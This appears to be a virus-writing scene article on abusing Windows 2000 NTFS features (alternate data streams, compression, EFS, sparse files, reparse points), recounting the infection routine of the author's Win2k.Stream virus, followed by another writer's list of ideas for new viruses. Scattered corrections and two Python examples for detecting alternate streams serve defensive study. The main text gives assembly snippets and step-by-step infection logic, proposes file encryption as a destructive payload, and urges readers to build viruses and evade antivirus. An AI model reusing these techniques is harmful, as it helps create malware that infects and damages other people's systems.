Streams are not a new feature of NTFS5; they have been implemented in NTFS since the very beginning of WinNT (version 3.1), but they have been downplayed by Micro$oft. In Win2k the position of streams is much better. And there also exists the first virus that uses streams. It's of course mine and Benny/29A's Win2k.Stream. I think you all have heard about it because of its big media success. It's a very easy and simple virus with a good idea, I think. We first heard about streams from a man called GriYo/29A (heya and thx man!) at a meeting in Brno. And then when Benny came to me for some days we decided to write our first common virus (and my first). It was really funny, because we coded through the night and very late we didn't even know what we were typing :) There also existed a version of Win2k.Stream with a polymorphic stream name! But the next day, when we woke up and talked about it in the pub, we decided to write it as simply as possible. And I think we succeeded - the comment is longer than the whole code XD. First we'll look at what streams exactly are and then we'll talk more about our virus.

On file systems such as FAT, FAT32 and others only one unnamed stream exists. What do you think it is? Exactly! The file itself. But on NTFS there also exist other (data) streams with a name. The name begins with ':' to indicate that it's a named stream (part of the file) and is appended to the file name (the unnamed stream). Look at this:

We have a file file.txt. It is also the unnamed stream. We would like to create a new stream within the file file.txt. We want to name it "RAT", for example. So we simply put ':' before the stream name and append it to the file name. So now we have somewhere in the buffer this: "file.txt:RAT". And now there's nothing easier than just using CreateFile(A|W) to create our stream. If creation succeeds you will get a handle that you can use as if it were a normal file (it is exactly a normal file ...). Two things worth knowing: the named stream shares the file's security descriptor, and it does not survive a copy to FAT or any other non-NTFS medium; dir and Explorer on Win2k do not show it, and the file size they report is the unnamed stream only.

Well, we have a stream within the file, but we forgot its name :) Any solution? Yeah, there is one. It's not as comfortable as it should be, but it's there. For our needs we'll need a function called BackupRead that can be found in kernel32.dll.

Look what MSDN says:

BOOL BackupRead(
    HANDLE  hFile,                 // handle to file or directory
    LPBYTE  lpBuffer,              // read buffer
    DWORD   nNumberOfBytesToRead,  // number of bytes to read
    LPDWORD lpNumberOfBytesRead,   // number of bytes read
    BOOL    bAbort,                // termination type
    BOOL    bProcessSecurity,      // process security options
    LPVOID  *lpContext             // context information
);

For our purposes we can ignore such thingies as security and context. hFile is the handle of the file whose streams we want to enumerate. lpBuffer should point to a structure called WIN32_STREAM_ID.

WIN32_STREAM_ID struc
    DWORD dwStreamId;
    DWORD dwStreamAttributes;
    QWORD Size;
    DWORD dwStreamNameSize;
    WCHAR cStreamName[ANYSIZE_ARRAY];
WIN32_STREAM_ID ends

The first 20 bytes of this structure (everything up to cStreamName) are the header of each stream. Then comes the name of the stream, and after the name the content of the stream. To enumerate all the streams you just need to loop until BackupRead returns FALSE. (Strictly, at the end of the data BackupRead returns TRUE with zero bytes read, so a robust loop also checks lpNumberOfBytesRead, and a final call with bAbort = TRUE releases the context.) Just look at the code snippet:

; in ebx - file handle to enumerate streams
enumerate_streams:
        push    offset lpcontext        ; lpContext (kept across calls)
        push    0                       ; bProcessSecurity
        push    0                       ; bAbort
        @pushvar <dd ?>                 ; lpNumberOfBytesRead (not checked here)
        push    20                      ; nNumberOfBytesToRead = header size
        push    offset buffer           ; lpBuffer
        push    ebx                     ; hFile
        call    BackupRead              ; read the stream header
        xchg    eax, ecx
        jecxz   end_enumerate_streams   ; error ?
        push    offset lpcontext
        push    0
        push    0
        @pushvar <dd ?>
        push    dword ptr [buffer+16]   ; nNumberOfBytesToRead = dwStreamNameSize
        push    offset buffer+20        ; stream name lands at buffer+header_size
        push    ebx                     ; (buffer must be large enough for it)
        call    BackupRead
        xchg    eax, ecx                ; error ?
        jecxz   end_enumerate_streams

; Now we have in buffer+20 the stream name in Unicode. Its length is
; [buffer+16] ...

        push    offset lpcontext        ; because BackupRead looks at the file and its
        @pushvar <dd 0>                 ; streams as if they were one file, we must
        @pushvar <dd 0>                 ; seek past the stream content.
        push    dword ptr [buffer+12]   ; dwHighBytesToSeek = high dword of Size
        push    dword ptr [buffer+8]    ; dwLowBytesToSeek  = low dword of Size
        push    ebx
        call    BackupSeek
        xchg    eax, ecx                ; error ?
        jecxz   end_enumerate_streams   ; (at end of data the seek fails, which is
        jmp     enumerate_streams       ;  what ends the loop; go on with the next stream)

end_enumerate_streams:
; note: a final BackupRead with bAbort = 1 should follow to free lpcontext

Well, I think that this is all you should know about streams for the beginning. Just do some more coding with it and I think you will become more familiar with it and you will use it in the future. Remember the words from Kaspersky/AVP: stream companion is a new breakthrough infection which is very hard to detect! Just give the AVers some more wrinkles ...

2.1.1. Win2k.Stream

And now something more about our babe. After execution it tries to find victims to infect via FindFirstFile & FindNextFile. It infects only *.exe files in the current directory (there were no reasons to spread it). The infection works as follows:

- first it checks if the file is compressed (see the next chapter)
- then it creates a temp file and copies the main stream to it
- copies the virus body to the main stream of the victim
- moves the temp file to the stream <victim_file>:STR
- compresses the file

So after infection the file looks like this (these are pictures from AVP :)):

   File before infection            File after infection

   ┌───────────────────┐            ┌───────────────────┐
   │                   │            │                   │
   │                   │            │    main stream    │
   │                   │            │    virus body     │
   │    main stream    │            │                   │
   │                   │            ├───────────────────┤
   │   program body    │            │                   │
   │                   │            │ additional stream │
   │                   │            │       :STR        │
   │                   │            │                   │
   ├───────────────────┤            ├───────────────────┤
   │                   │            │                   │
   │  service streams  │            │  service streams  │
   │                   │            │                   │
   └───────────────────┘            └───────────────────┘

Then it tries to find the next file, etc. At the end it just runs the <victim_file>:STR stream, where the victim body is, via CreateProcess. When the victim ends it just invokes ExitProcess and ends. If any error occurs it displays the following text:

"Win2k.Stream by Benny/29A & Ratter"
"This cell has been infected by [Win2k.Stream] virus!"

and ends. This is also the payload on FAT, FAT32 and other file systems that do not support streams. And that's all. Simple, ain't it? Note that after infection the virus body is what sits in the unnamed stream, which every scanner reads; what this layout hides from tools that don't enumerate streams is the displaced host in :STR, not the virus.
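The following is an added example for this page (not the article's code and not Win2k.Stream's): a Python walk over the WIN32_STREAM_ID records in the same header / name / content layout the assembly loop above relies on, plus the check a scanner needs, listing the named $DATA streams of a file so an executable with a ':STR:$DATA' companion stands out. The parser works on any byte string in BackupRead format; the SAMPLE buffer is constructed by hand, the stream-id constants are from winnt.h, and read_backup_stream_win32() is a Windows-only ctypes driver that pulls the real byte stream of a file.

```python
"""Walk the WIN32_STREAM_ID records BackupRead emits and list named $DATA
streams.  Added example for this page, not code from the article or from
Win2k.Stream; the SAMPLE buffer is constructed by hand."""
import struct
import sys
from dataclasses import dataclass

# dwStreamId values (winnt.h)
BACKUP_DATA = 1             # the unnamed (main) data stream
BACKUP_SECURITY_DATA = 3    # security descriptor
BACKUP_ALTERNATE_DATA = 4   # a named $DATA stream such as file.exe:STR

# Fixed part of WIN32_STREAM_ID: dwStreamId, dwStreamAttributes, Size (QWORD),
# dwStreamNameSize = 20 bytes; cStreamName (UTF-16LE) starts at offset 20.
# That is why the article's loop reads 20 bytes, then [buffer+16] more.
HEADER_FMT = "<IIQI"
HEADER_SIZE = struct.calcsize(HEADER_FMT)   # 20


@dataclass
class StreamRecord:
    stream_id: int
    attributes: int
    size: int
    name: str


def parse_backup_stream(buf: bytes) -> list[StreamRecord]:
    """Parse bytes laid out the way BackupRead serialises a file:
    header | name | content | header | name | content ...  Each stream's
    content is skipped by its Size field, which is what BackupSeek does."""
    records, off = [], 0
    while off < len(buf):
        if off + HEADER_SIZE > len(buf):
            raise ValueError(f"truncated WIN32_STREAM_ID header at offset {off}")
        stream_id, attrs, size, name_size = struct.unpack_from(HEADER_FMT, buf, off)
        off += HEADER_SIZE
        name = buf[off:off + name_size].decode("utf-16-le")
        off += name_size
        if off + size > len(buf):
            raise ValueError(f"stream {name!r} claims {size} bytes past end of buffer")
        off += size
        records.append(StreamRecord(stream_id, attrs, size, name))
    return records


def named_data_streams(buf: bytes) -> list[str]:
    """Names of all alternate $DATA streams.  An executable carrying one
    (Win2k.Stream leaves ':STR:$DATA') deserves a closer look."""
    return [r.name for r in parse_backup_stream(buf) if r.stream_id == BACKUP_ALTERNATE_DATA]


def build_record(stream_id: int, name: str, data: bytes) -> bytes:
    """Serialise one stream the way BackupRead would (used for the sample)."""
    wname = name.encode("utf-16-le")
    return struct.pack(HEADER_FMT, stream_id, 0, len(data), len(wname)) + wname + data


# Constructed sample: the post-infection layout from 2.1.1, with the virus in
# the unnamed stream and the displaced host in :STR.
SAMPLE = (build_record(BACKUP_DATA, "", b"MZ...virus body...")
          + build_record(BACKUP_ALTERNATE_DATA, ":STR:$DATA", b"MZ...original host..."))


def read_backup_stream_win32(path: str) -> bytes:
    """Windows only: fetch the raw BackupRead byte stream of `path` through
    ctypes so it can be fed to parse_backup_stream()."""
    import ctypes
    from ctypes import wintypes
    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    k32.CreateFileW.restype = wintypes.HANDLE
    k32.CreateFileW.argtypes = [wintypes.LPCWSTR, wintypes.DWORD, wintypes.DWORD, ctypes.c_void_p,
                                wintypes.DWORD, wintypes.DWORD, wintypes.HANDLE]
    k32.BackupRead.argtypes = [wintypes.HANDLE, ctypes.c_void_p, wintypes.DWORD, wintypes.LPDWORD,
                               wintypes.BOOL, wintypes.BOOL, ctypes.POINTER(ctypes.c_void_p)]
    k32.CloseHandle.argtypes = [wintypes.HANDLE]
    GENERIC_READ, FILE_SHARE_READ, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS = 0x80000000, 1, 3, 0x02000000
    h = k32.CreateFileW(path, GENERIC_READ, FILE_SHARE_READ, None, OPEN_EXISTING,
                        FILE_FLAG_BACKUP_SEMANTICS, None)
    if h == wintypes.HANDLE(-1).value:          # INVALID_HANDLE_VALUE
        raise ctypes.WinError(ctypes.get_last_error())
    out, ctx, got = bytearray(), ctypes.c_void_p(None), wintypes.DWORD(0)
    chunk = ctypes.create_string_buffer(65536)
    try:
        # End of data is reported as TRUE with zero bytes read, not as FALSE.
        while k32.BackupRead(h, chunk, len(chunk), ctypes.byref(got), False, False, ctypes.byref(ctx)) and got.value:
            out += chunk.raw[:got.value]
    finally:
        if ctx.value:                            # bAbort=TRUE releases the context
            k32.BackupRead(h, None, 0, ctypes.byref(got), True, False, ctypes.byref(ctx))
        k32.CloseHandle(h)
    return bytes(out)


if __name__ == "__main__":
    data = read_backup_stream_win32(sys.argv[1]) if len(sys.argv) > 1 and sys.platform == "win32" else SAMPLE
    for rec in parse_backup_stream(data):
        print(f"id={rec.stream_id} size={rec.size:>10} name={rec.name!r}")
    print("alternate data streams:", named_data_streams(data))
```

Run it without arguments to see the constructed sample parsed; on Windows pass a path and it reads the real stream list. The parser reads the whole BackupRead output rather than seeking like the assembly does, which is fine for a scanner but means a multi-gigabyte file is read in full.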

2.2. Compression and encryption

We were also the first to use NTFS's ability to compress files, in our babe. It is transparent to the application, so it's a great way to reduce the loss of free disk space after infection. If we want to compress a file we must call the file system driver via DeviceIoControl with the right IoControlCode ... look at this code snippet from Win2k.Stream and also from my Win2k.Purple (but the first who did this was Benny/29A in his Win32.HIV. At our mini-meeting he decided that we would use it in Win2k.Stream first ...)

FSCTL_SET_COMPRESSION equ 9 shl 16 or 3 shl 14 or 16 shl 2

        xor     eax, eax
        push    eax                     ; lpOverlapped = NULL
        @pushvar <dd ?>                 ; lpBytesReturned
        push    eax                     ; nOutBufferSize = 0
        push    eax                     ; lpOutBuffer = NULL
        push    4                       ; nInBufferSize (a USHORT is enough; a dword is passed)
        @pushvar <dd 1>                 ; lpInBuffer -> COMPRESSION_FORMAT_DEFAULT
        push    FSCTL_SET_COMPRESSION
        push    ebx                     ; NTFS compress it = mark as already infected
        call    DeviceIoControl         ; and save disk space :)
                                        ; (the return value is not checked: on FAT the
                                        ; FSCTL fails and the file is never marked)

and now what MSDN says:

BOOL DeviceIoControl(
    (HANDLE) hDevice,            // handle to file
    FSCTL_GET_COMPRESSION,       // dwIoControlCode operation
    NULL,                        // lpInBuffer; must be NULL
    0,                           // nInBufferSize; must be zero
    (LPVOID) lpOutBuffer,        // output buffer
    (DWORD) nOutBufferSize,      // size of output buffer
    (LPDWORD) lpBytesReturned,   // number of bytes returned
    (LPOVERLAPPED) lpOverlapped  // OVERLAPPED structure
);

That is the GET variant, which returns the current compression state in a USHORT. The SET call used in the snippet takes the compression format (COMPRESSION_FORMAT_DEFAULT = 1) in lpInBuffer and needs no output buffer; it only works on NTFS and only on a handle opened with write access. Using the compressed attribute as the "already infected" marker also means any file the user compressed himself is skipped.

I think that it is clear. And also simple to implement in your virus. Just do it!

The next thingie is encryption. It can easily be used by calling the functions EncryptFile and DecryptFile :). I think that it could be applied as a payload, because if you encrypt a file on a Win2k machine then only the user who encrypted the file has access to it. After encrypting some files there can be very good chaos on the machine :) (EFS encrypts with the key of the account the call runs under, so the files stay readable for that account and for the recovery agent; what gets locked out is everybody else, or the owner once his profile or key is gone.)

BOOL EncryptFile(
    LPCTSTR lpFileName   // file name
);

BOOL DecryptFile(
    LPCTSTR lpFileName,  // file name
    DWORD   dwReserved   // reserved; must be zero
);

I think I'm repeating myself, but - easy to implement, easy to use ...

2.3. Sparse files

I don't know if anyone finds a use for sparse files in virus coding, but I found this to be a very nice feature of NTFS5, so I would like to talk about it here. Have you ever imagined how much space must be wasted in databases in which most of the file is null (free records)? A lot :) And here comes a solution for such applications: sparse files. (Sounds like an M$ promotion :)) We as programmers can define where in the file such holes (filled with nulls) lie and tell the file system. The file system will then store to disk only the data which we say is not null ... the code snippet will show more:

BOOL DeviceIoControl(
    (HANDLE) hDevice,            // handle to a file
    FSCTL_SET_SPARSE,            // dwIoControlCode operation
    NULL,                        // lpInBuffer; must be NULL
    0,                           // nInBufferSize; must be zero
    NULL,                        // lpOutBuffer; must be NULL
    0,                           // nOutBufferSize; must be zero
    (LPDWORD) lpBytesReturned,   // number of bytes returned
    (LPOVERLAPPED) lpOverlapped  // OVERLAPPED structure
);

FSCTL_SET_SPARSE equ 9 shl 16 or 2 shl 14 or 49 shl 2
FILE_BEGIN       equ 0

        push    0                       ; hTemplateFile
        push    0                       ; dwFlagsAndAttributes
        push    CREATE_ALWAYS           ; dwCreationDisposition
        push    0                       ; lpSecurityAttributes
        push    0                       ; dwShareMode
        push    GENERIC_WRITE           ; dwDesiredAccess
        @pushsz "SparseFile"            ; lpFileName
        call    CreateFileA             ; create file SparseFile
        xchg    eax, ebx
        xor     eax, eax
        push    eax                     ; lpOverlapped
        @pushvar <dd ?>                 ; lpBytesReturned
        push    eax                     ; nOutBufferSize
        push    eax                     ; lpOutBuffer
        push    eax                     ; nInBufferSize
        push    eax                     ; lpInBuffer
        push    FSCTL_SET_SPARSE        ; sign this file as a sparse file
        push    ebx
        call    DeviceIoControl         ; (not checked: on FAT this fails and the
                                        ;  SetEndOfFile below really allocates 32 GB)
        push    FILE_BEGIN              ; dwMoveMethod
        @pushvar <dd 8>                 ; lpDistanceToMoveHigh -> 8 * 4 GB = 32 GB
        push    0                       ; lDistanceToMove
        push    ebx                     ; move the file pointer to 32 gigabytes (hyea Gig :))
        call    SetFilePointer
        push    ebx
        call    SetEndOfFile            ; fill with nulls up to 32 gigz
        push    ebx
        call    CloseHandle

This code snippet will create a file whose size is 32 GB! But actually the real size is null :) Nice, ain't it? (GetFileSize reports the 32 GB; GetCompressedFileSize reports what is really allocated, which is the number to look at when a suspiciously huge file turns up.) And how do we let the file system know that we have holes in our file? Here's the prototype of the function we can use ...

BOOL DeviceIoControl(
    (HANDLE) hDevice,            // handle to a file
    FSCTL_SET_ZERO_DATA,         // dwIoControlCode operation
    (LPVOID) lpInBuffer,         // pointer to FILE_ZERO_DATA_INFORMATION
    (DWORD) nInBufferSize,       // size of input buffer
    NULL,                        // lpOutBuffer; must be NULL
    0,                           // nOutBufferSize; must be zero
    (LPDWORD) lpBytesReturned,   // number of bytes returned
    (LPOVERLAPPED) lpOverlapped  // OVERLAPPED structure
);

typedef struct _FILE_ZERO_DATA_INFORMATION {
    LARGE_INTEGER FileOffset;
    LARGE_INTEGER BeyondFinalZero;
} FILE_ZERO_DATA_INFORMATION, *PFILE_ZERO_DATA_INFORMATION;

And that's all about sparse files for now ...
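The `equ` arithmetic in the compression section (2.2) and in the sparse-file section above is the CTL_CODE macro from winioctl.h written out by hand. The following added example (not the article's code) builds and decodes those control codes in Python so the magic numbers can be checked, and then plans the FSCTL_SET_ZERO_DATA ranges for a buffer: only whole clusters inside a zeroed range are deallocated by NTFS, so the planner shrinks each zero run inward to cluster boundaries and packs the FILE_ZERO_DATA_INFORMATION structure for the surviving ranges. The 4 KB cluster size and the SAMPLE buffer are assumptions for the demonstration.

```python
"""Build and decode the FSCTL codes the article writes as `equ` arithmetic,
and plan FSCTL_SET_ZERO_DATA ranges for a sparse file.  Added example for
this page; it is not code from the article or from Win2k.Stream."""
import struct

# CTL_CODE layout (winioctl.h): DeviceType(16) | Access(2) | Function(12) | Method(2)
FILE_DEVICE_FILE_SYSTEM = 0x9
METHOD_BUFFERED = 0
FILE_ANY_ACCESS = 0
FILE_READ_ACCESS = 1     # FILE_READ_DATA: the handle must have read access
FILE_WRITE_ACCESS = 2    # FILE_WRITE_DATA: the handle must have write access

CLUSTER = 4096           # assumed NTFS cluster size for the sample below


def ctl_code(device_type: int, function: int, method: int, access: int) -> int:
    """Same arithmetic as the CTL_CODE macro (and as the article's `equ` lines)."""
    if not (0 <= function < 0x1000 and 0 <= method <= 3 and 0 <= access <= 3):
        raise ValueError("CTL_CODE field out of range")
    return (device_type << 16) | (access << 14) | (function << 2) | method


def decode_ctl_code(code: int) -> dict:
    """Split a control code back into its fields; useful when an unknown
    DeviceIoControl shows up in a trace."""
    return {"device_type": code >> 16, "access": (code >> 14) & 3,
            "function": (code >> 2) & 0xFFF, "method": code & 3}


# The codes used in the article, as the macro calls they stand for.  The access
# field is what the I/O manager checks against the handle's granted rights
# before the file system sees the request, so a read-only handle cannot issue
# any of the SET calls.
FSCTL_GET_COMPRESSION = ctl_code(FILE_DEVICE_FILE_SYSTEM, 15, METHOD_BUFFERED, FILE_ANY_ACCESS)
FSCTL_SET_COMPRESSION = ctl_code(FILE_DEVICE_FILE_SYSTEM, 16, METHOD_BUFFERED,
                                 FILE_READ_ACCESS | FILE_WRITE_ACCESS)
FSCTL_SET_SPARSE = ctl_code(FILE_DEVICE_FILE_SYSTEM, 49, METHOD_BUFFERED, FILE_WRITE_ACCESS)
FSCTL_SET_ZERO_DATA = ctl_code(FILE_DEVICE_FILE_SYSTEM, 50, METHOD_BUFFERED, FILE_WRITE_ACCESS)


def zero_runs(data: bytes, min_len: int = CLUSTER) -> list[tuple[int, int]]:
    """Maximal runs of zero bytes of at least min_len, as (FileOffset,
    BeyondFinalZero) pairs, i.e. the FILE_ZERO_DATA_INFORMATION convention
    with an exclusive end."""
    runs, i, n = [], 0, len(data)
    while i < n:
        if data[i]:
            i += 1
            continue
        j = i
        while j < n and not data[j]:
            j += 1
        if j - i >= min_len:
            runs.append((i, j))
        i = j
    return runs


def deallocatable(runs, cluster: int = CLUSTER) -> list[tuple[int, int]]:
    """What NTFS will actually free: only whole clusters inside a zeroed range
    are deallocated; the partial clusters at either end are zero-filled but
    stay allocated.  Shrinks each run inward to cluster boundaries."""
    out = []
    for start, end in runs:
        s = -(-start // cluster) * cluster   # round the start up
        e = (end // cluster) * cluster       # round the end down
        if e - s >= cluster:
            out.append((s, e))
    return out


def file_zero_data_information(file_offset: int, beyond_final_zero: int) -> bytes:
    """Pack FILE_ZERO_DATA_INFORMATION (two LARGE_INTEGERs) for lpInBuffer."""
    if not 0 <= file_offset <= beyond_final_zero:
        raise ValueError("BeyondFinalZero must not precede FileOffset")
    return struct.pack("<qq", file_offset, beyond_final_zero)


# Constructed sample: a header, a 10000-byte hole, a record, and a second hole
# that is too short to span a whole cluster.
SAMPLE = b"A" * 100 + b"\0" * 10000 + b"B" * 50 + b"\0" * 3000 + b"C"


if __name__ == "__main__":
    for name, code in [("FSCTL_SET_COMPRESSION", FSCTL_SET_COMPRESSION),
                       ("FSCTL_SET_SPARSE", FSCTL_SET_SPARSE)]:
        print(f"{name} = {code:#x} -> {decode_ctl_code(code)}")
    for off, beyond in deallocatable(zero_runs(SAMPLE)):
        print(f"FSCTL_SET_ZERO_DATA {off}..{beyond}: "
              f"{file_zero_data_information(off, beyond).hex()}")
```

The access bits are the practical caveat: FSCTL_SET_COMPRESSION as the article defines it carries both read and write access bits, so a handle opened with GENERIC_WRITE alone is refused before NTFS is reached, and the "already infected" marker is never set.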

2.4. Reparse points

This thingy is my little favourite :) What are reparse points? A reparse point is a block of user-defined data associated with a file or directory. The content of that data is known to the application and to the file system (filter) driver which handles it. When NTFS opens a file and recognises that the file has a reparse point, it fails the open with STATUS_REPARSE and hands the reparse data back up the driver stack, where a filter that knows the tag stored in that data can act on it. The raw data (max 16 KB) is passed to that filter and what the driver does with it is up to the driver. The file system filter driver you install sits on top of the file system drivers. What you intercept is up to you. Do you see it? You can do everything with that file. You can infect files just by setting a reparse point on them. You can change some data in that file, store it in the reparse point, and whenever the file is opened you restore that content and on file close you reinfect it. Without your file system filter the file will have broken content ... With this you can infect !_all_! files! I must say that it is charming. But it has some holes. Such a file carries FILE_ATTRIBUTE_REPARSE_POINT, and FSCTL_GET_REPARSE_POINT reveals its tag, so a file with a tag nobody recognises is easy to spot. We must also find out how to spread the mother (the file system driver). But first we must create that mother :) This will be a little problem, because we need the IFS Kit (the kit for writing installable file system drivers) and M$ wants too much money (for me ...) for it. If someone has it, please contact me. It also needs some more studying. But one day it will come :))

2.5. Mounting

There is not much to say about this topic. I think that most of you know mounting from various *nix systems such as Linux. If you want to set a volume mount point you will need three functions:

GetVolumeNameForVolumeMountPoint, SetVolumeMountPoint and sometimes DeleteVolumeMountPoint.

If you want documentation, let me know. I'll give it to you. Just one thing to mention: in *nixes this feature has been implemented for 30 years. Micro$oft implemented it now. Does that mean a 30-year gap between the technologies?? Everyone must answer this question for himself :))

That's all for now about NTFS5. There's more to say on each of the topics I was talking about in this article, but I think it is enough for the beginning. Just code and study, and if you have problems, contact me. If I can help you (== if I know it) I will help you.

3. Job kernel object

Do you have problems managing processes in your virus? Your virus uses IPC and creates a lot of processes and you want a comfortable way to destroy them all? In Win2k you can use a Job kernel object, which lets you group processes together and create a sandbox that restricts what these processes are allowed to do. Then you can destroy all the processes just by terminating the Job object. Let's go deeper.

First you must create a job object. This can be done via the CreateJobObject API function.

HANDLE CreateJobObject(
    LPSECURITY_ATTRIBUTES lpJobAttributes,  // SD (can be NULL for our purposes)
    LPCTSTR lpName                          // job name (if NULL the job is a no-name job :))
);

So now we have created a job and we have a handle to it. Now we must assign some process to it. Just use AssignProcessToJobObject ... (On Win2k a process can belong to only one job, so the call fails for a process that is already in another one.)

BOOL AssignProcessToJobObject(
    HANDLE hJob,       // handle to job
    HANDLE hProcess    // handle to process
);

Easy. Now we can place some restrictions on the processes within the job, but that's not so necessary for now. I promised termination of all processes via one API function, right? Here it is ...

BOOL TerminateJobObject(
    HANDLE hJob,       // handle to job
    UINT   uExitCode   // exit code
);

After calling this function with the right job handle all processes within the job will be terminated. Merely closing the job handle does not kill anything: the processes outlive the job unless JOB_OBJECT_LIMIT_KILL_ON_JOB_CLOSE was set on it with SetInformationJobObject, so either set that limit or call TerminateJobObject explicitly.

4. Otherz

- In Win2k the Toolhelp32 library is implemented. You can again use functions such as CreateToolhelp32Snapshot, Process32First etc. It is very useful when writing per-(multi-)process residency for Win9x and Win2k. In WinNT until now you could only use EnumProcesses and EnumProcessModules from psapi. These two functions weren't in Win9x, so there was double code in viruses for both operating systems.

- For easier access to the registry you can use functions from the Shell Lightweight API (shlwapi.dll). These functions are:

  SHDeleteEmptyKey
  SHDeleteKey
  SHDeleteValue
  SHGetValue
  SHSetValue
  SHQueryValueEx
  SHEnumKeyEx
  SHEnumValue
  SHQueryInfoKey
  SHRegGetBoolUSValue

  E.g. to read a value you had to open the registry subkey, call RegQueryValueEx and then close the registry key. SHGetValue does everything in one step.

- When you are infecting a file, check it with SfcIsFileProtected (sfc.dll; it takes a NULL RPC handle and a Unicode path), which will tell you whether the file is protected or not. (I'm writing an article about how to fuck SFP and then it will be easier :))

- If you want to go to some system directory such as system32 etc., use the function ExpandEnvironmentStrings, which lets you use environment variables. E.g. until now you had to get the Windows directory and then append system32. Now you just pass a string like %SystemRoot%\system32 to Expand..., which returns the expanded path. (There is no %system32% variable; SystemRoot and windir are the ones the system defines.)

DWORD ExpandEnvironmentStrings(
    LPCTSTR lpSrc,   // string with environment variables
    LPTSTR  lpDst,   // string with expanded strings
    DWORD   nSize    // maximum characters in expanded string
);

5. End

I need rest!!! If you aren't crazy after reading this article then you are not normal :) For such people a little song:

Settle for nothing

A jail cell is freedom from the pain in my home
Hatred passed on, passed on and passed on
A world of violent rage
But it's one that I can recognize
Having never seen the color of my father's eyes
Yes, I dwell in hell but it's a hell that I can grip
I tried to grip my family
But I slipped
To escape from the pain and an existence mundane
I gotta 9, a sign, a set and now I gotta name

Read my writing on the wall
No one's here to catch me when I fall
But death is on my side
Suicide!!!!!!

Read my writing on the wall
No one's here to catch me when I fall
Caught between my culture and the system
Genocide!!!!!!

Read my writing on the wall
No one's here to catch me when I fall
If ignorance is bliss
Then knock the smile off my face

If we don't take action now
We settle for nothing later
We'll settle for nothing now
And we'll settle for nothing later

Do you know who sings this? It's my beloved song from my beloved group. If you know the name of that group tell it to me on #virus and you will get a prize. (Well, I still don't know what the prize will look like, but you will get one :))

And that's all for now ... If you find any errors, just contact me please. Thanks for reading!

Ratter ([email protected]) - I'm a stranger in the world I haven't made.


A few ideas for viruses

Kalkin/EViL

These are difficult times for us virus writers. No, I don't mean the cops, society or the press. I mean the process of writing a virus. Yes, there are tons of material about this subject and quite some people who can help, but that's usually with technical problems. What if you want to do something radically new? It's actually not so easy, because everything has already been done: polymorphic macro viruses, ACCESS infection, Linux viruses. You can realise some parts of the virus in a never-seen-before way, but these parts are mainly just solutions to some technical problem or other. But you want to do something NEW and INTERESTING, something like the spying virus from CodeBreakers or the payload of CIH. Maybe this article will help you.

.LNK and/or .PIF infection

Maybe this has already been done, but I haven't heard about it (on the other hand, I'm not too well informed about what goes on in the scene). Anyway, if so, then the credit goes to the one who had the idea.

As you all know, .LNKs are small link files, so-called shortcuts, that were introduced with Windows 95 (in Microsoft's OS world) and should eliminate the need to copy one program into several folders. .PIFs are basically the same, only they also contain useful loading information and are for DOS programs. Both formats contain the path of the original program. It wouldn't be hard to replace this path with the path to our infected file, which would execute the real program after its own actions. This would be some kind of companion virus. It would be even better, because how many AV programs check for changes in .LNK/.PIF files? Another plus is that this infection method basically works on every OS that has shortcuts of some sort (symbolic links on Linux, for example). The only problem is that a virus which uses just this method of infecting won't spread to any other computer (it will "travel" only if somebody for some reason copies our file to another PC). But this method can be used to increase the chance of the virus being executed, especially in the case of runtime viruses.

Alias "infection"

This idea is based on the previous one and works on DOS (under 4DOS and NDOS) and *NIX systems (I think). A virus could set some aliases to itself and after infecting some files execute the original program.

Name changing

What if a DOS virus hooks INT 21h, saves and then changes the name (set by exec, found by findfirst) to the name of an infected file (in memory)? The infected file would be executed, copied to disk, included in a ZIP archive. If the proper code is included then this viralised item wouldn't be opened for editing (the real one would). A Windows virus could do the same. And this method is better for spreading than the above two.

Infection of format programs

This idea was originally by MiKE The Hacker/TPT Gang and describes a hybrid virus that infects formatting programs and modifies them so that they put the same virus on the boot sector of the formatted disk. This would be better than just a boot sector infector, because you can't get rid of the virus by re-formatting the disk (at least with this formatter). A reboot won't help either. This idea can be enhanced: infecting CD writing programs, so that an AUTORUN.INF and an infected file would be written to the CD. It should be a little bit easier (no need for a hybrid virus) and also better, because there's no way you can get rid of the virus on a CD (unless you're burning CD-RWs). Disadvantages: not too few formatting/CD-burning programs exist.

Intel Pentium Pro fucking

I came to this idea when I was surfing through Ralf Brown's Interrupt List. It says there that by using interrupt 15h and setting AX to D042h it's possible to install a microcode patch into the Pentium Pro processor. I haven't checked this and have no idea how much the patch can affect the CPU, so I don't know if the proper code will really fuck the processor or will do nothing. It's too bad that there aren't so many Pentium Pros around, because there seems to be CIH potential. (In practice the processor accepts only update blocks that pass Intel's checksum and decryption, and whatever is loaded is gone at the next reset, so this interface gives no way to push arbitrary code into the CPU.)

"Collection" viruses

This idea was inspired by GriYo/29A's SIMBIOSIS project. If you don't know what it is: it output a polymorphic virus onto an Internet worm that contained an SMTP engine. A so-called collection virus is a virus (or worm) that contains several (let's say 5) viruses which will be released in random order.

"Part-upgrading" viruses

Those viruses would have a "serial number" for every part of themselves: the procedure for finding files, the polymorphic engine, the infecting part. When such a virus "meets" another part-upgrading virus, it would check all serial numbers and if some of them are newer than its own, it would copy the updated procedure to itself. But when it finds a part that it doesn't have, the virus would copy the part to itself and add a call or jump to it. So basically those viruses expand themselves. A direct-action COM infector could for example add to itself parts to go TSR and infect EXEs.

Quoting viruses

It's a lame and not new idea. Such a virus would display as payload quotations of some famous person. For example Socrates. The good thing is that there are MANY people who have said something (I never said it should be something smart or meaningful).

Intro/demo viruses

I don't mean product demos here, but graphics demos like the ones presented at demo parties and compos (check http://www.hornet.org to get the picture). Intro viruses would play such video effects as payload. Advantages: usually small size, nice, different (what do you think, will people remember better a lame text-mode "Infecto-ViruZ" in black and white or an "IntroVirus" in 24-bit colour accompanied by breathtakingly beautiful moving clouds?)

Simulating anti-anti-virus viruses

